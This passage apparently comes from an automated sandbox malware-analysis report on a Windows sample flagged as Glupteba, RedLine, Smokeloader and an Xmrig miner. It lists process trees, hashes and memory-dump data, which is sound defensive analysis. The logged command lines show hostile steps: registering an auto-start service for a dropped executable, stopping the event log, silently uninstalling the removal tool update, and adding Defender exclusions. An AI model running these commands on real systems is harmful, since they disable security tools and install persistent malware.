                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:14
                                                                                          Start time:08:31:14
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell -nologo -noprofile
                                                                                          Imagebase:0x9b0000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:15
                                                                                          Start time:08:31:14
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:16
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                          Imagebase:0x7ff61fd30000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:17
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\sc.exe delete "UTIXDCVF"
                                                                                          Imagebase:0x7ff659d30000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:18
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:19
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:20
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\wusa.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                          Imagebase:0x7ff75a260000
                                                                                          File size:345'088 bytes
                                                                                          MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:21
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"
                                                                                          Imagebase:0x7ff659d30000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:22
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:23
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                                          Imagebase:0x7ff659d30000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:24
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\sc.exe start "UTIXDCVF"
                                                                                          Imagebase:0x7ff659d30000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:25
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:26
                                                                                          Start time:08:31:15
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:27
                                                                                          Start time:08:31:16
                                                                                          Start date:24/07/2024
Path: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
Wow64 process (32bit): false
Commandline: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
Imagebase: 0x7ff7ee4a0000
File size: 2'654'720 bytes
MD5 hash: B03886CB64C04B828B6EC1B2487DF4A4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 91%, ReversingLabs
Has exited: true

Target ID: 28
Start time: 08:31:16
Start date: 24/07/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 08:31:16
Start date: 24/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 08:31:17
Start date: 24/07/2024
Path: C:\Windows\servicing\TrustedInstaller.exe
Wow64 process (32bit): false
Commandline: C:\Windows\servicing\TrustedInstaller.exe
Imagebase: 0x7ff628a10000
File size: 192'336 bytes
MD5 hash: D098F2FC042FBF6879D47E3A86FBB4A1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 08:31:18
Start date: 24/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
Imagebase: 0x7ff77afe0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 32
Start time: 08:31:18
Start date: 24/07/2024
Path: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
Imagebase: 0x400000
File size: 4'315'536 bytes
MD5 hash: D122F827C4FC73F9A06D7F6F2D08CD95
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.1591101509.000000000299E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000020.00000002.1591528645.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited: true

Target ID: 33
Start time: 08:31:18
Start date: 24/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase: 0x7ff77afe0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 34
Start time: 08:31:19
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692
Imagebase: 0xf20000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 08:31:19
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 844
Imagebase: 0xf20000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 08:31:19
Start date: 24/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff61fd30000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 08:31:19
Start date: 24/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 38
Start time: 08:31:19
Start date: 24/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 39
Start time: 08:31:19
Start date: 24/07/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: explorer.exe
Imagebase: 0x7ff633410000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1502667713.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3820414733.0000000001431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1502528304.0000000001E56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503963151.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3820414733.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1504028725.0000000001E43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503587405.0000000001E27000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503587405.0000000001E43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1502528304.0000000001E4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1504082814.0000000001E36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503356384.0000000001E78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503661320.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1503356384.0000000001E57000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3820414733.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3822093253.0000000001E2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited: false

Target ID: 40
Start time: 08:31:19
Start date: 24/07/2024
Path: C:\Windows\System32\wusa.exe
Wow64 process (32bit): false
Commandline: wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff75a260000
File size: 345'088 bytes
MD5 hash: FBDA2B8987895780375FE0E6254F6198
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 08:31:22
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -nologo -noprofile
Imagebase: 0x9b0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 08:31:22
Start date: 24/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 08:31:53
Start date: 24/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase: 0x7ff77afe0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 46
Start time: 08:32:01
Start date: 24/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1374714127.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1790000_25C1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5be17497ff9cc2c307418e9bb41b5ae842af33cb5964016727d930613352d6ad
                                                                                            • Instruction ID: 3e55a311b34c10ac4bc7ad50f0f3d4ad08da150e87592dfa970ff4494695dd08
                                                                                            • Opcode Fuzzy Hash: 5be17497ff9cc2c307418e9bb41b5ae842af33cb5964016727d930613352d6ad
                                                                                            • Instruction Fuzzy Hash: 0B510A34900249CFCB05DFB5E990A9EBBB2FB49704F6045ADC4116B351CB39AD96CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1374714127.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1790000_25C1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7e7f7d197518a979eefdf5d7be7eb4e4ad64e1a82dbc4ee5b303f47e17cbb592
                                                                                            • Instruction ID: 954342b2c361139c40e2dce5b506146dab78f84f44cdfd75d421a9c25d9eba6c
                                                                                            • Opcode Fuzzy Hash: 7e7f7d197518a979eefdf5d7be7eb4e4ad64e1a82dbc4ee5b303f47e17cbb592
                                                                                            • Instruction Fuzzy Hash: AC71F530700240DFDB25DB28E998A69BBBAFF85310F498169D946C7396CF34EC95CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1374714127.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1790000_25C1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0fa5f7b0a4ff4c446599bd7e9e9d62c037584218d663b1382faa8927819f3f32
                                                                                            • Instruction ID: cadf7bc74ba31bd94f62aa4e917b5ccd658968ea06855c9c4d8487d44a0cfa8d
                                                                                            • Opcode Fuzzy Hash: 0fa5f7b0a4ff4c446599bd7e9e9d62c037584218d663b1382faa8927819f3f32
                                                                                            • Instruction Fuzzy Hash: 31511A34900349CFCB15DFB9EA8069EBBB2FB49704F60456DC4116B354CB39AD96CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1374714127.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1790000_25C1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6709f78d96b6db6a2d5de5883154c696abc768657ded97f0b6c4f7ddf384747c
                                                                                            • Instruction ID: 8df5657fe870d6795ba5c15e0cfaf81aac11f623eba513bd8d3201951f8a70a7
                                                                                            • Opcode Fuzzy Hash: 6709f78d96b6db6a2d5de5883154c696abc768657ded97f0b6c4f7ddf384747c
                                                                                            • Instruction Fuzzy Hash: 5631F5317006168FCF05DBADE4809AEFBF9EF85214B144166E419DB252DB30ED4ACBD0

                                                                                            Execution Graph

                                                                                            Execution Coverage:4.4%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:50%
                                                                                            Total number of Nodes:12
                                                                                            Total number of Limit Nodes:1

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 028307EE
                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0283080E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2830000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 3833638111-0
                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction ID: f6eb900e340429372f1f3f912505ee090bf49652f6d08fb7751133858f5e4ad8
                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction Fuzzy Hash: D6F0623D2007147BD7213BB9AC8DB6F76E8EF49629F100528E646D10C0DB70E8458AA1

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 028304D6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2830000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction ID: f17c0e41234af7b365e5209817f924ef93902d20da7713dd9daea1a936d944f2
                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction Fuzzy Hash: 8A113C79A00208EFDB01DF98C985E99BBF5AF08351F158094F948AB361D371EA90DF90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2830000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                            • Instruction ID: 2276f0549dea911d17943def1054916e422843b388eee5b1f415deb8c1095030
                                                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                            • Instruction Fuzzy Hash: 5A11827A340104AFD754DF59DCD0FA673EAEB89324B198065ED08CB312E775E842CBA0

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                            • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                            • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                            • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                            • %, xrefs: 00433B64
                                                                                            • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                            • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                            • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000840000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000C77000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000C7A000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CCF000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CD3000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CEF000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CF6000.00000040.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • API String ID: 0-2845907608
                                                                                            • Opcode ID: 5abccb9955bb7e61ea68e392401cb810dba1d0244b6c3c0f14204fc9a1a2f5da
